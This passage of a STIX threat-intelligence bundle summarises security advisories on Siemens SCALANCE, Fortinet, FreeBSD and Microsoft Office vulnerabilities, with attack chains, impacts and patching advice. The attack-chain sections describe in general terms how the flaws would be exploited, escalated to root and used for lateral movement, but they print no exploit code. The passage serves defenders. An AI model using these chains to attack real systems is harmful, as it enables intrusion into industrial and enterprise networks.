          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4d4f0a83-4f60-5b4a-be67-ec7dcac4eb82",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--121f059d-af64-5f1b-b10e-0a6ffc919506",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--121f059d-af64-5f1b-b10e-0a6ffc919506",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Critical Vulnerabilities in Siemens SCALANCE Industrial Network Products, Including Unpatched Devices",
      "description": "## Overview\n\nSiemens has disclosed multiple critical vulnerabilities affecting a wide range of its SCALANCE industrial network products, specifically across the LPE, M, W, and X series. These vulnerabilities, including CVE-2025-15467, could enable a remote attacker to execute arbitrary code, initiate a denial-of-service condition, or compromise the confidentiality of data on the affected devices. All versions of the listed products are impacted. A significant concern for defenders is that Siemens has explicitly stated that some products, notably SCALANCE LPE9413 and LPE9433, will not receive security patches for CVE-2025-15467, leaving them permanently vulnerable to this critical flaw. These devices are widely used in industrial control systems (ICS) environments, making the potential impact on operational technology (OT) networks severe. The advisories were published on June 9, 2026, by CERT-FR and Siemens.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains network access to a vulnerable Siemens SCALANCE device, potentially exposed directly to the internet or accessible within an internal network segment.\n2.  **Vulnerability Exploitation**: The attacker crafts and sends a malicious network request or specially formatted input to the vulnerable SCALANCE device, exploiting CVE-2025-15467 or other unspecified vulnerabilities.\n3.  **Arbitrary Code Execution**: Successful exploitation of specific vulnerabilities (e.g., CVE-2025-15467) leads to arbitrary code execution, allowing the attacker to run commands on the affected device.\n4.  **Denial of Service**: Alternatively, exploitation of other vulnerabilities could cause the SCALANCE device to become unresponsive or crash, leading to a remote denial of service (DoS) and disruption of network communications.\n5.  **Data Confidentiality Breach**: Exploitation may also enable unauthorized access to sensitive configuration data, network traffic, or other information processed by the network device.\n6.  **Lateral Movement/Operational Disruption**: With arbitrary code execution, the attacker could use the compromised SCALANCE device as a pivot point for lateral movement within the OT network or to manipulate network traffic, causing wider operational disruption.\n\n## Impact\n\nThe impact of these vulnerabilities is significant, particularly for organizations operating Industrial Control Systems (ICS) and Operational Technology (OT) networks where Siemens SCALANCE devices are deployed. Successful exploitation could lead to widespread disruption of industrial processes, safety incidents, and compromise of critical infrastructure. Arbitrary code execution grants attackers deep control over network segments, enabling them to alter device configurations, intercept or manipulate industrial protocols, and potentially exfiltrate sensitive operational data. A denial-of-service attack could halt production, disrupt communication between critical systems, and incur substantial financial losses due to downtime and recovery efforts. The lack of patches for certain products means these critical risks will persist, necessitating urgent mitigation strategies for affected organizations.\n\n## Recommendation\n\n*   Immediately identify all Siemens SCALANCE LPE, M, W, and X series devices within your environment using inventory logs, specifically checking for the models listed in the \"Affected Products\" section.\n*   For products that will receive patches, apply all available Siemens security updates as soon as possible, following the vendor's guidance in their security advisories (e.g., Siemens SSA-063511, SSA-139483, SSA-434797).\n*   Implement stringent network segmentation and access controls to restrict direct access to SCALANCE devices, especially for models vulnerable to CVE-2025-15467 without a patch, as recommended in the Siemens security advisories.\n*   Monitor network traffic to and from SCALANCE devices for unusual connection attempts, high-volume traffic patterns, or communication with suspicious external IP addresses, detectable via rules like \"Detect Network Scans for ICS/OT Devices\".\n*   Deploy the Sigma rules in this brief to your SIEM and tune them for your OT network environment to detect potential exploitation attempts or post-exploitation activities.\n",
      "published": "2026-06-14T09:10:59Z",
      "labels": [
        "industrial_control_systems",
        "ics_scada",
        "vulnerability",
        "siemens",
        "network_device",
        "ot"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0714/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1fbaf992-82dc-5391-ad12-51188558ce89",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.fortiguard.com/psirt/FG-IR-26-140",
      "pattern": "[url:value = 'https://www.fortiguard.com/psirt/FG-IR-26-140']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:12:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad39e3f3-ffa3-580e-a345-66441ad47274",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "indicator--1fbaf992-82dc-5391-ad12-51188558ce89"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--441be80b-9578-5d6d-b174-86767e8b263d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.fortiguard.com/psirt/FG-IR-26-141",
      "pattern": "[url:value = 'https://www.fortiguard.com/psirt/FG-IR-26-141']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:12:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64c019ca-a67e-5666-946f-326e61d94ea6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "indicator--441be80b-9578-5d6d-b174-86767e8b263d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b91ac345-a6c8-5ea9-a15b-5066772c2665",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.fortiguard.com/psirt/FG-IR-26-143",
      "pattern": "[url:value = 'https://www.fortiguard.com/psirt/FG-IR-26-143']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:12:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d5d65d7-56f8-5e6f-b183-6cc96880f167",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "indicator--b91ac345-a6c8-5ea9-a15b-5066772c2665"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2e0c9256-ec29-5855-a9ec-21a180b419f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2025-67862",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2025-67862']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:12:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fbdc8fad-333c-56cf-a60b-198f83207769",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "indicator--2e0c9256-ec29-5855-a9ec-21a180b419f4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--05839003-7455-5834-be34-791abda83d49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-25089",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-25089']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:12:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b35f134-7f11-5dd4-ac76-1c06c3ceb879",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "indicator--05839003-7455-5834-be34-791abda83d49"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26c23d15-f941-5a9e-80f1-baeb7b0ee214",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-49938",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-49938']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:12:27Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91708d98-a014-5e7c-8033-3b9994c38eb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "indicator--26c23d15-f941-5a9e-80f1-baeb7b0ee214"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--675877a7-248e-51d5-b9da-395e4e17f197",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1210",
          "url": "https://attack.mitre.org/techniques/T1210"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a708b43a-7b58-5284-82a2-ed32a3e9c163",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2a55cd8-fc52-5a9e-962c-d4ac5dfa4111",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Transfer Data to Cloud Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e3cdbe3a-b07e-5ef3-8e03-77778a54a841",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fac4e4b4-07b4-53d7-8450-85c853f2683b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Critical Vulnerabilities in Fortinet Products Lead to RCE and Data Exposure",
      "description": "## Overview\n\nMultiple critical vulnerabilities (CVE-2025-67862, CVE-2026-25089, CVE-2026-49938) have been identified across various Fortinet products including FortiOS, FortiPortal, FortiProxy, and FortiSandbox. These flaws, detailed in Fortinet security bulletins FG-IR-26-140, FG-IR-26-141, and FG-IR-26-143 issued on June 9, 2026, could allow an unauthenticated attacker to achieve remote arbitrary code execution (RCE) and compromise data confidentiality. CERT-FR published an advisory (CERTFR-2026-AVI-0725) on June 10, 2026, urging immediate patching. The widespread deployment of Fortinet products in enterprise networks makes these vulnerabilities high-impact, as successful exploitation could lead to full system compromise, network breaches, and sensitive data exposure without prior authentication.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a vulnerable Fortinet product (e.g., FortiOS, FortiPortal, FortiProxy, FortiSandbox) exposed to the internet.\n2. The attacker crafts and sends a malicious HTTP request targeting the specific vulnerability (CVE-2025-67862, CVE-2026-25089, or CVE-2026-49938).\n3. The vulnerable Fortinet product processes the malformed request, triggering the underlying vulnerability, potentially in a web-facing component.\n4. Successful exploitation of RCE vulnerabilities (CVE-2026-25089, CVE-2026-49938) allows the attacker to execute arbitrary commands on the underlying operating system of the appliance.\n5. With RCE, the attacker gains full control over the compromised Fortinet device, enabling them to establish persistence or deploy further malicious payloads.\n6. The attacker can then use the compromised device as a pivot point to move laterally within the network or access sensitive data, leveraging data confidentiality vulnerabilities (CVE-2025-67862) to exfiltrate information.\n7. The final objective could range from network reconnaissance, further system compromise, data theft, or disruption of network services.\n\n## Impact\n\nThe identified vulnerabilities pose a critical risk to organizations utilizing affected Fortinet products. Successful exploitation, particularly of the RCE flaws, could lead to full compromise of the Fortinet appliance itself, granting attackers a foothold within the perimeter network. This could facilitate unauthorized access to internal systems, network segmentation bypasses, and the deployment of additional malware such as backdoors or ransomware. Data confidentiality breaches could result in the exposure of sensitive network configurations, user credentials, or other critical business data, potentially leading to significant financial loss, reputational damage, and regulatory penalties. The widespread use of Fortinet products globally means a broad array of organizations across various sectors could be susceptible.\n\n## Recommendation\n\n*   Immediately apply the security patches provided by Fortinet for all affected products listed in this brief (FortiOS \u003c 7.2.11, FortiPortal \u003c 7.4.8, FortiProxy \u003c 7.2.15, FortiSandbox \u003c 5.0.6, etc.) to address CVE-2025-67862, CVE-2026-25089, and CVE-2026-49938.\n*   Deploy the provided Sigma rules \"Detects CVE-2026-25089/49938 Exploitation Attempts - Suspicious HTTP Request Patterns\" and \"Detects CVE-2025-67862 Exploitation Attempts - Unusual HTTP Access to Sensitive Paths\" to your SIEM to detect potential exploitation attempts.\n*   Ensure web server logging is enabled and configured for detailed HTTP request information on all Fortinet devices to support detection via the Sigma rules.\n*   Monitor network traffic for unusual outbound connections originating from Fortinet devices, especially after patching, as a potential indicator of prior compromise (referencing `network_connection` log source).\n",
      "published": "2026-06-14T09:12:27Z",
      "labels": [
        "remote-code-execution",
        "data-exfiltration",
        "vulnerability",
        "fortinet",
        "network-appliance"
      ],
      "object_refs": [
        "indicator--1fbaf992-82dc-5391-ad12-51188558ce89",
        "indicator--441be80b-9578-5d6d-b174-86767e8b263d",
        "indicator--b91ac345-a6c8-5ea9-a15b-5066772c2665",
        "indicator--2e0c9256-ec29-5855-a9ec-21a180b419f4",
        "indicator--05839003-7455-5834-be34-791abda83d49",
        "indicator--26c23d15-f941-5a9e-80f1-baeb7b0ee214",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0725/"
        },
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-26-140"
        },
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-26-141"
        },
        {
          "source_name": "reference",
          "url": "https://www.fortiguard.com/psirt/FG-IR-26-143"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-67862"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25089"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49938"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ce9b926e-f0a5-57fb-95a3-c850824dee26",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.freebsd.org/security/advisories/FreeBSD-SA-26:26.ktls.asc",
      "pattern": "[url:value = 'https://www.freebsd.org/security/advisories/FreeBSD-SA-26:26.ktls.asc']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:13:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0e71b170-752f-5ef0-b48e-7b85f0654d9d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--61e5b9c9-3763-5a0f-8751-d360c5a1d75f",
      "target_ref": "indicator--ce9b926e-f0a5-57fb-95a3-c850824dee26"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--18197967-740d-5191-aae6-5ccefc72b5d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.freebsd.org/security/advisories/FreeBSD-SA-26:30.linux.asc",
      "pattern": "[url:value = 'https://www.freebsd.org/security/advisories/FreeBSD-SA-26:30.linux.asc']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:13:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5577c635-67a2-5e11-9a36-7d075f7d1890",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--61e5b9c9-3763-5a0f-8751-d360c5a1d75f",
      "target_ref": "indicator--18197967-740d-5191-aae6-5ccefc72b5d8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--da63a9cf-44bc-569a-905b-61404ff99376",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-45257",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-45257']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:13:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f46c6be1-018b-5f1d-8602-21708cf2037d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--61e5b9c9-3763-5a0f-8751-d360c5a1d75f",
      "target_ref": "indicator--da63a9cf-44bc-569a-905b-61404ff99376"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8eb5acf2-70f5-595f-bced-952556503108",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-49413",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-49413']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:13:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0d51db0-07c7-5a50-9c88-e594f9992d00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--61e5b9c9-3763-5a0f-8751-d360c5a1d75f",
      "target_ref": "indicator--8eb5acf2-70f5-595f-bced-952556503108"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--61e5b9c9-3763-5a0f-8751-d360c5a1d75f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Privilege Escalation Vulnerabilities in FreeBSD (CVE-2026-45257, CVE-2026-49413)",
      "description": "## Overview\n\nCERT-FR has issued an advisory regarding multiple privilege escalation vulnerabilities discovered in FreeBSD. These vulnerabilities, identified as CVE-2026-45257 and CVE-2026-49413, affect various versions across FreeBSD branches 14 and 15. CVE-2026-45257 involves an out-of-bounds write in the `rt_ktls_init_key` and `rt_ktls_set_key` functions within the kernel's network routing code, while CVE-2026-49413 allows a local attacker to map arbitrary physical memory pages via the Linux compatibility layer. Successful exploitation grants a local, unprivileged attacker root privileges on the compromised system, enabling them to bypass security controls, exfiltrate data, or establish persistence. It is crucial for defenders to patch affected systems immediately to prevent unauthorized access and system compromise.\n\n## Attack Chain\n\n1.  **Initial Access**: A local unprivileged attacker gains or already possesses user-level access to a vulnerable FreeBSD system.\n2.  **Vulnerability Trigger (CVE-2026-45257)**: The attacker executes a specially crafted program that interacts with the kernel's routing table, specifically targeting the `rt_ktls_init_key` or `rt_ktls_set_key` functions to trigger an out-of-bounds write.\n3.  **Vulnerability Trigger (CVE-2026-49413)**: The attacker utilizes the Linux compatibility layer to perform malformed memory mapping operations, allowing them to map arbitrary physical memory pages into their process address space.\n4.  **Kernel Primitive Acquisition**: Successful exploitation of either vulnerability provides the attacker with a powerful kernel primitive, such as arbitrary kernel memory read/write capabilities or kernel code execution.\n5.  **Privilege Escalation**: The attacker leverages the kernel primitive to modify their process's credentials, effectively elevating their user ID (UID) and effective user ID (EUID) to `0` (root).\n6.  **Root Shell / Arbitrary Command Execution**: With root privileges, the attacker typically spawns a root shell (e.g., `/bin/sh`) or executes arbitrary commands as the `root` user.\n7.  **Post-Exploitation Activity**: The attacker proceeds with actions such as disabling security measures, installing backdoors, exfiltrating sensitive data, or deploying additional malicious payloads.\n\n## Impact\n\nThe successful exploitation of these privilege escalation vulnerabilities allows a local attacker to gain full control over the affected FreeBSD system. This can lead to complete system compromise, enabling the attacker to access, modify, or delete any data, install malware, create new privileged user accounts, or completely disable the system. For organizations, this translates to severe data breaches, disruption of critical services, and potential regulatory non-compliance. While specific victim counts are not provided, any unpatched FreeBSD system is at risk.\n\n## Recommendation\n\n*   Immediately apply the security updates provided by FreeBSD for the affected versions mentioned in the FreeBSD security advisories CVE-2026-45257 and CVE-2026-49413.\n*   Deploy the Sigma rules in this brief to your SIEM and tune them for your environment to detect post-exploitation activity.\n*   Enable comprehensive `process_creation` and `file_event` logging on FreeBSD systems to allow for detection of suspicious activity by the provided Sigma rules.\n*   Review access controls and ensure that only trusted users have local access to FreeBSD systems, reducing the attack surface for local privilege escalation.\n",
      "published": "2026-06-14T09:13:46Z",
      "labels": [
        "freebsd",
        "vulnerability",
        "privilege-escalation",
        "local-privilege-escalation"
      ],
      "object_refs": [
        "indicator--ce9b926e-f0a5-57fb-95a3-c850824dee26",
        "indicator--18197967-740d-5191-aae6-5ccefc72b5d8",
        "indicator--da63a9cf-44bc-569a-905b-61404ff99376",
        "indicator--8eb5acf2-70f5-595f-bced-952556503108"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0716/"
        },
        {
          "source_name": "reference",
          "url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-26:26.ktls.asc"
        },
        {
          "source_name": "reference",
          "url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-26:30.linux.asc"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45257"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49413"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--31fa9636-8806-599c-8e24-7a3db898794b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--96076488-48fe-5791-9990-13a285f9ebe1",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6569627f-628c-5a43-8f8a-58aa68d1f389",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--96076488-48fe-5791-9990-13a285f9ebe1",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3bdc933c-bdd7-5e54-8af2-e672c3a3f1fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--96076488-48fe-5791-9990-13a285f9ebe1",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b186156-3e64-5e26-802a-4c5b83aa8c5e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--96076488-48fe-5791-9990-13a285f9ebe1",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--96076488-48fe-5791-9990-13a285f9ebe1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Microsoft Office Products (June 2026)",
      "description": "## Overview\n\nCERT-FR has released an advisory detailing 31 critical and high-severity vulnerabilities affecting numerous Microsoft Office products. These vulnerabilities, identified by CVEs such as CVE-2026-44803 (the first listed) and CVE-2026-47635 (the last listed), were disclosed by Microsoft on June 9, 2026. The flaws impact a wide range of Office applications, including Microsoft 365 Apps, various versions of Excel, Word, PowerPoint, and Office Online Server, across Windows, macOS, and Android platforms. Successful exploitation of these vulnerabilities could lead to arbitrary remote code execution, elevation of privileges on affected systems, and unauthorized access to sensitive data, posing a significant risk to organizational assets. While no specific threat actors or active exploitation campaigns are detailed in the advisory, these types of vulnerabilities are frequently targeted by advanced persistent threats and opportunistic attackers.\n\n## Attack Chain\n\n1.  **Initial Access**: A user receives and opens a specially crafted Microsoft Office document (e.g., Word, Excel, or PowerPoint file) delivered via a phishing email, malicious download, or other social engineering methods.\n2.  **Exploitation**: The malicious document leverages one of the disclosed vulnerabilities (e.g., CVE-2026-44803) within the vulnerable Microsoft Office application upon opening or specific user interaction.\n3.  **Remote Code Execution**: Successful exploitation results in remote code execution (RCE) within the context of the compromised Office application process, allowing the attacker to execute arbitrary commands.\n4.  **Payload Delivery**: The executed code downloads and executes additional malicious payloads (e.g., malware droppers, backdoors, or command-and-control agents) from an external attacker-controlled server.\n5.  **Privilege Escalation**: The attacker may then exploit another vulnerability (e.g., CVE-2026-44812) or leverage a misconfiguration to escalate privileges, gaining higher system access on the compromised host.\n6.  **Objective Achievement**: With elevated privileges and persistent access, the attacker can proceed with their objectives, which may include lateral movement across the network, exfiltration of sensitive data, further system compromise, or deployment of additional malicious software.\n\n## Impact\n\nThe successful exploitation of these vulnerabilities could have severe consequences for affected organizations. Attackers could gain complete control over compromised systems, leading to extensive data breaches, operational disruption, and the 